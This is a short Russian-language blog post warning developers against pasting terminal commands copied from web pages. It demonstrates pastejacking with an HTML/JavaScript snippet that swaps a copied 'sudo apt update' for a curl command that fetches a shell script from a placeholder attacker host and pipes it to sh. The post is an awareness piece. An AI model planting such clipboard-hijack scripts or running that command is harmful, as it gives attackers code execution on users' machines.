Опасность копирования и вставки кода в терминал прямо с web страниц

НИКОГДА не следует копировать команды и вставлять их прямо в свой терминал. Спросите любого разработчика или администратора, копировали ли они когда-либо командную строку или фрагмент кода из Интернета. Ответ, вероятно, будет ДА, всегда так делаю!

Вы думаете, что копируете что-то одно, а оно заменяется чем-то другим, например, вредоносным кодом. Все, что требуется, — это одна строка кода, вставленная в код, который вы скопировали, чтобы создать бэкдор в вашем приложении.

Эта атака очень проста, но при этом очень вредна. Вот как это работает:

Допустим, вы искали, как обновить свой ubuntu, и нашли эту командную строку. И копируете:

Попробуйте — скопируйте команду ниже:

sudo apt update


А теперь вставьте ниже то, что скопировали:

Код отвечающий за это выглядит так:

<strong id="copy">sudo apt update</strong>

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>

Самый безопасный способ — не вставлять что-либо, скопированное из Интернета, в свой терминал. Также многие терминалы можно настроить так, чтобы они не выполнялись автоматически при вставке «\n» (новая строка)

 

Оставить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *